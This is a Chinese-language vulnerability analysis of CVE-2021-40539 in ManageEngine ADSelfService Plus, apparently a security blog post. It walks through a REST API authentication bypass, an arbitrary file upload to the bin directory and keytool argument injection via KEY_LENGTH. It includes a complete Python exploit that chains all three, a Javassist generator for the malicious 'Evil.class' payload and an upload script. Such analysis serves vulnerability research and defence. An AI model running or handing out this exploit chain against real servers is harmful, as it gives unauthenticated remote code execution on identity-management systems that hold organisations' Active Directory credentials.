环境搭建
https://archives2.manageengine.com/self-service-password/6113/ManageEngine_ADSelfService_Plus_64bit.exe
直接下载对应的版本然后再本地搭建
data:image/s3,"s3://crabby-images/1b83a/1b83aee603e9209ac8d800ea2920cb98d2c77500" alt="I54B3d.png"
配置远程调试
data:image/s3,"s3://crabby-images/53f47/53f47647a09d7cec2c359779c650182660449fb8" alt="I54v8J.png"
修改wrapper.conf,这样即可再IDEA中调试
data:image/s3,"s3://crabby-images/7bcc7/7bcc71dd46c2ca2ab6fabcb69e2318d7c52b1518" alt="I54UAO.png"
漏洞复现
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36
| import requests
def UploadRunCalc(url): uploadUrl=url+"./RestAPI/LogonCustomization" files = {'CERTIFICATE_PATH': open('Evil.class', 'rb')}
proxies={"http":None}
uploadData = { "methodToCall": "unspecified", "Save": "1", "form": "smartcard", "operation": "Add" }
r1 = requests.post(uploadUrl, data=uploadData, files=files, proxies=proxies)
runUrl=url+"./RestAPI/Connection"
runData={ "methodToCall":"openSSLTool", "action":"generateCSR", "KEY_LENGTH":'123 -providerclass "Evil" -providerpath "..\\bin"'
} r2 = requests.post(url=runUrl, data=runData,proxies=proxies)
if __name__=="__main__": url = "http://win-iobn7uhkolu:8888/" UploadRunCalc(url)
|
执行成功
data:image/s3,"s3://crabby-images/b4c4f/b4c4f527729300ca3368b33468d9617aaec7ff5a" alt="I54O5F.png"
分析
CVE-2021-40539实现RCE的过程由3个漏洞组成,分别是
- Restful API认证绕过
- 任意文件上传
- 命令拼接
Restful API认证绕过
查看web.xml,RestAPI对应的servlet是action
data:image/s3,"s3://crabby-images/7d70e/7d70e0f9e4d006dd5d7ec64e11f5c481931434aa" alt="I54cHf.png"
ADSFilter是一个全局过滤器
data:image/s3,"s3://crabby-images/8bb22/8bb2205dbab3a100c6580a771f3fef8ca9c890ce" alt="I54d4e.png"
com.manageengine.ads.fw.filter.ADSFilter#doFilter
定位到对应的类
判断如果是Restful API访问,尝试提取认证信息,然后调用doSubFilters
:
data:image/s3,"s3://crabby-images/0502e/0502e6f1b489bc03becd47c38c40163fbb213c45" alt="I54aND.png"
com.manageengine.ads.fw.filter.ADSFilter#doSubFilters
重点在RestAPIUtil.isRestAPIRequest
data:image/s3,"s3://crabby-images/99545/995453c2483c3f96a362240c478bec11455327c9" alt="I54yut.png"
com.manageengine.ads.fw.api.RestAPIUtil#isRestAPIRequest
正常访问/RestAPI/LicenseMgr
,发现没有权限
data:image/s3,"s3://crabby-images/a869a/a869ade7932515803f8f841f3fc4d600f1ba3c6d" alt="I54rjI.png"
在isRestAPIRequest
中可以看到对目录访问的限制,这里只需要绕过一下正则匹配,在前面加上/.
即可
data:image/s3,"s3://crabby-images/aa4a4/aa4a473fa2feef54ea99de315e5f6122605cfff4" alt="I5409H.png"
这样就能绕过
data:image/s3,"s3://crabby-images/5ff56/5ff56cb857e6d56324e45ff6e92abb894154a9c7" alt="I546DP.png"
成功未授权访问
data:image/s3,"s3://crabby-images/a869a/a869ade7932515803f8f841f3fc4d600f1ba3c6d" alt="I54rjI.png"
任意文件上传
在struts-config.xml
中找到对应的接口/LogoCustomization
,再定位到对应的类com.adventnet.sym.adsm.common.webclient.admin.LogonCustomization#unspecified
data:image/s3,"s3://crabby-images/7f6a9/7f6a9628b2174422bf89d202037991f22d3694c5" alt="I542E8.png"
com.adventnet.sym.adsm.common.webclient.admin.LogonCustomization#unspecified
当输入的参数符合条件时,会调用addSmartCardConfig
1
| Save=1&form=smartcard&operation=Add
|
data:image/s3,"s3://crabby-images/96d3a/96d3aaa3ff38a4933527307cb902816a2b90cd1d" alt="I54hCQ.png"
com.manageengine.ads.fw.authentication.smartcard.SmartCardAction#addSmartCardConfig
调用getFileFromRequest
data:image/s3,"s3://crabby-images/203a6/203a6d424057007c314ff83ac940ac7737ee7b05" alt="I54RUS.png"
com.manageengine.ads.fw.util.FileActionHandler#getFileFromRequest
上传文件
data:image/s3,"s3://crabby-images/a7c1c/a7c1c22e46b1fb6824c5ef629c9da7744042b4bd" alt="I54W4g.png"
上传成功会显示404
data:image/s3,"s3://crabby-images/eea96/eea964a5a2950a269ac2cf1e704b6bb25e37fdb9" alt="I5443j.png"
成功上传到bin目录下
data:image/s3,"s3://crabby-images/9ad7b/9ad7b46b6af5712f9a5c7473a995bf0a07afd676" alt="I545gs.png"
上传文件用的脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
| import requests
url="http://win-iobn7uhkolu:8888/./RestAPI/LogonCustomization"
files = {'CERTIFICATE_PATH': open('1.txt', 'rb')}
proxies={"http":None}
data={ "methodToCall":"unspecified", "Save":"1", "form":"smartcard", "operation":"Add" } r = requests.post(url, data=data,files=files,proxies=proxies)
|
命令注入
com.adventnet.sym.adsm.common.webclient.admin.ConnectionAction
data:image/s3,"s3://crabby-images/97422/97422a739b3d1a39fe280011053a7fabbf7fb700" alt="I54Ivn.png"
com.adventnet.sym.adsm.common.webclient.admin.ConnectionAction
满足条件时进入SSLUtil.createCSR(request)
data:image/s3,"s3://crabby-images/a1b83/a1b839b6ee42bbcd14e3eee7aacf1f435d56b5e1" alt="I54Tuq.png"
com.adventnet.sym.adsm.common.webclient.util.SSLUtil#createCSR
进入createCSR
data:image/s3,"s3://crabby-images/03f82/03f82bd3d27d19363407c20cce02b5f5f7c9b3d5" alt="I54HbV.png"
com.adventnet.sym.adsm.common.webclient.util.SSLUtil#createCSR
调用runCommand
执行命令,参数-keysize
直接来源于KEY_LENGTH
,而KEY_LENGTH
来源于request.getParameter("KEY_LENGTH")
,这样就可以进行命令注入
data:image/s3,"s3://crabby-images/1802e/1802e190b98d59d0b140fa15f3d6d18762bfea91" alt="I54jC4.png"
data:image/s3,"s3://crabby-images/4a3b4/4a3b455729011ac6dec5f5d4c2e3c3c641bfe1b5" alt="I54qET.png"
主要调用了keytool.exe -genkey
,这个方法的参数如下
genkey命令有两个参数providerclass
和providerpath
,可以用来指定字节码.class文件和文件路径,然后执行字节码文件中的JAVA代码。这里跟前面的任意文件上传配合一下就可以实现RCE了,先上传一个class文件到bin目录,然后利用keytool拼接命令指定对应的参数,就可以执行上传的字节码文件。
data:image/s3,"s3://crabby-images/6035f/6035f3305e441219ed476256200128815868d716" alt="I547D0.png"
实际上拼接进去的参数如下
1
| KEN_LENGTH=1024 -providerclass "Evil" -providerpath "C:\\ManageEngine\\ADSelfService Plus\\bin"
|
生成一个恶意class文件,然后把它上传上去,然后利用keytool命令注入执行即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import javassist.ClassClassPath; import javassist.ClassPool; import javassist.CtClass; import javassist.CtConstructor;
public class JavassistTest { public static void main(String[] args) throws Exception {
ClassPool pool=ClassPool.getDefault(); CtClass ctClass=pool.makeClass("Evil"); String cmd="{java.lang.Runtime.getRuntime().exec(\"calc\");}";
CtConstructor ctConstructor=ctClass.makeClassInitializer(); ctConstructor.insertBefore(cmd);
ctClass.writeFile("./");
} }
|
实际执行的命令
data:image/s3,"s3://crabby-images/647e5/647e5b1ba49612aac1db95cee9cf30480d1dd268" alt="I54LUU.png"
参考
https://forum.butian.net/share/876
https://www.jianshu.com/p/a1591b2ad7cf